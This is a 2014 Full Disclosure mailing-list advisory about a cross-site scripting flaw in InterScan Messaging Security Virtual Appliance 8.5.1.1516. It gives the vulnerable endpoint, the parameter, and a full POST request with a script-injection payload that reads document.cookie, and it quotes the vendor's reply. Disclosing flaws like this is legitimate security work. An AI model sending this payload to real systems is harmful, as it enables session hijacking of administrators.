'[FD] XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance 8.5.1.1516 (Zero-DA'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance 8.5.1.1516 (Zero-DA
From:       William Costa <william.costa () gmail ! com>
Date:       2014-05-29 15:55:03
Message-ID: CAOmMdVs8T15nwk1maZn9sK5KbYKb_gut5A8o=JKoOUR+LFAZFw () mail ! gmail ! com
[Download RAW message or body]

I. VULNERABILITY
-------------------------

XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance
8.5.1.1516

II. DESCRIPTION
-------------------------
Has been detected a XSS vulnerability in InterScan Messaging Security
Virtual Appliance version 8.5.1.1516.
The code injection is done through the parameter "addWhiteListDomainStr"
send via post in the page "/addWhiteListDomain.imss"

III. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter
"addWhiteListDomainStr" correctly.

https://10.200.210.100:8445/addWhiteListDomain.imss

Host=10.200.210.100:8445
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0)
Gecko/20100101 Firefox/29.0
Accept=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate Referer=
https://186.230.33.160/trend-interscan/trend.php
Cookie=JSESSIONID=68D4F0AEF4874173BDE77FAA4895231F; CurrentLocale=en- US;
PHPSESSID=2ok068gfak8np5isbe5k5l4nf3; un=7164ceee6266e893181da6c33936e4a4;
userID=1; LANG=en;
wids=modImsvaSystemUseageWidget,modImsvaMailsQueueWidget,modImsvaQuara
ntineWidget,modImsvaArchiveWidget,; lastID=15; theme=default; lastTab=1;
GetPageTab=1
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=95
POSTDATA=addWhiteListDomainStr=aaaa.com"><script>alert(document.cookie
);</script>)

https://vimeo.com/96757096

IV. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser allowing session
hijacking.

V. SYSTEMS AFFECTED
-------------------------
Tested in InterScan Messaging Security Virtual Appliance 8.5.1.1516

VI. SOLUTION
------------------------

Answer from Trend.

Hi William,

According to our Product Developers, this is not vulnerability of our
product. All of the cookies(not just IMSVA) can be stolen from a
compromised environment. It was highly suggested that you upgrade your
client to ensure safety.
Also, they recommended another Trend Micro Product  -"OfficeScan" that may
be suitable for your environment.

I hope this information helps. Please let me know if you have additional
questions or clarifications.

Have a great day!

By William Costa

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread] 